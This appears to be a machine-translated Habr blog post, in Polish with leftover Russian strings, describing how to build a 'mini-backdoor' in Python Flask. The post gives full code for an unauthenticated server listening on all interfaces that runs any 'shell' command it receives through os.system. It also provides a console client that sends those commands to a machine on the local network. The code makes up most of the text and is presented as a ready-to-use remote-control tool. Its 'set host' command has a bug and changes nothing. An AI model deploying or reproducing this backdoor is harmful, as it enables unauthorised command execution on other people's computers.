Hej Habra!
Niedawno obejrzałem pobraną wersję strumienia programistycznego „Jak stworzyć własną aplikację internetową w Flasku”. I postanowiłem skonsolidować swoją wiedzę w jakimś projekcie. Długo nie wiedziałem co napisać i przyszedł mi do głowy pomysł: „Dlaczego by nie zrobić mini-backdoora w Flasku?”
Od razu w mojej głowie pojawiły się pierwsze opcje implementacji i możliwości backdoora. Postanowiłem jednak od razu sporządzić listę możliwości backdoora:
- Wiedzieć, jak otwierać strony internetowe
- Mieć dostęp do wiersza poleceń
- Możliwość otwierania programów, zdjęć i filmów
Zatem pierwszy punkt jest niezwykle łatwy do wdrożenia za pomocą modułu przeglądarki internetowej. Zdecydowałem się zaimplementować drugi punkt za pomocą modułu os. A trzeci również odbywa się przez moduł os, ale użyję „linków” (więcej o tym później).
Pisanie serwera
Więc *bębń* cały kod serwera:
from flask import Flask, request
import webbrowser
import os
import re
app = Flask(__name__)
@app.route('/mycomp', methods=['POST'])
def hell():
json_string = request.json
if json_string['command'] == 'test':
return 'The server is running and waiting for commands...'
if json_string['command'] == 'openweb':
webbrowser.open(url='https://www.'+json_string['data'], new=0)
return 'Site opening ' + json_string['data'] + '...'
if json_string['command'] == 'shell':
os.system(json_string['data'])
return 'Command execution ' + json_string['data'] + '...'
if json_string['command'] == 'link':
links = open('links.txt', 'r')
for i in range(int(json_string['data'])):
link = links.readline()
os.system(link.split('>')[0])
return 'Launch ' + link.split('>')[1]
if __name__ == '__main__':
app.run(host='0.0.0.0')
Cały kod już wrzuciłem, czas wyjaśnić istotę.
Cały kod działa na komputerze lokalnym na porcie 5000. Aby wejść w interakcję z serwerem, musimy wysłać żądanie JSON POST.
Struktura żądania JSON:
{‘command’: ‘comecommand’, ‘data’: ‘somedata’}Cóż, logiczne jest, że „polecenie” to polecenie, które chcemy wykonać. A „dane” to argumenty poleceń.
Możesz ręcznie pisać i wysyłać żądania JSON w celu interakcji z serwerem (żądania ci pomogą). Możesz też napisać klienta konsolowego.
Pisanie klienta
Kod:
import requests
logo = ['nn',
'****** ********',
'******* *********',
'** ** ** **',
'** ** ** ** Written on Python',
'******* ** **',
'******** ** **',
'** ** ** ** Author: ROBOTD4',
'** ** ** **',
'** ** ** **',
'******** *********',
'******* ********',
'nn']
p = ''
iport = '192.168.1.2:5000'
host = 'http://' + iport + '/mycomp'
def test():
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
def start():
for i in logo:
print(i)
start()
test()
while True:
command = input('>')
if command == '':
continue
a = command.split()
if command == 'test':
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
if a[0] == 'shell':
for i in range(1, len(a)):
p = p + a[i] + ' '
dict = {'command': 'shell', 'data': p}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
p = ''
if a[0] == 'link':
if len(a) > 1:
dict = {'command': 'link', 'data': int(a[1])}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('Комманда не содержит аргументов!')
if a[0] == 'openweb':
if len(a) > 1:
dict = {'command': 'openweb', 'data': a[1]}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('Комманда не содержит аргументов!')
if a[0] == 'set':
if a[1] == 'host':
ip = a[2] + ':5000'
if command == 'quit':
break
Wyjaśnienia:
W pierwszej kolejności importowany jest moduł żądań (w celu interakcji z serwerem). Poniżej znajdują się opisy funkcji startu i testu. A potem cykl, w którym dzieje się magia. Czytałeś kod? Więc rozumiesz znaczenie magii, która dzieje się w cyklu. Wpisz polecenie - zostanie wykonane. Shell – polecenia dla wiersza poleceń (logika jest poza skalą).
Test – sprawdź czy serwer działa (backdoor)
Link – użycie „skrótu”
Openweb – otwarcie strony internetowej
Wyjdź – wyjdź z klienta
Set – ustawienie adresu IP komputera w sieci lokalnej
A teraz więcej o linku.
Obok serwera znajduje się plik link.txt. Zawiera linki (pełną ścieżkę) do plików (filmów, zdjęć, programów).
Struktura jest następująca:
полный_путь>описание
полный_путь>описание
Łączny
Posiadamy serwer typu backdoor umożliwiający kontrolę komputera w sieci lokalnej (w ramach sieci Wi-Fi). Technicznie rzecz biorąc, możemy uruchomić klienta z dowolnego urządzenia, które posiada interpreter Pythona.
PS Dodałem polecenie set, dzięki czemu jeśli komputerowi w sieci lokalnej zostanie przypisany inny adres IP, można go zmienić bezpośrednio w kliencie.
Źródło: www.habr.com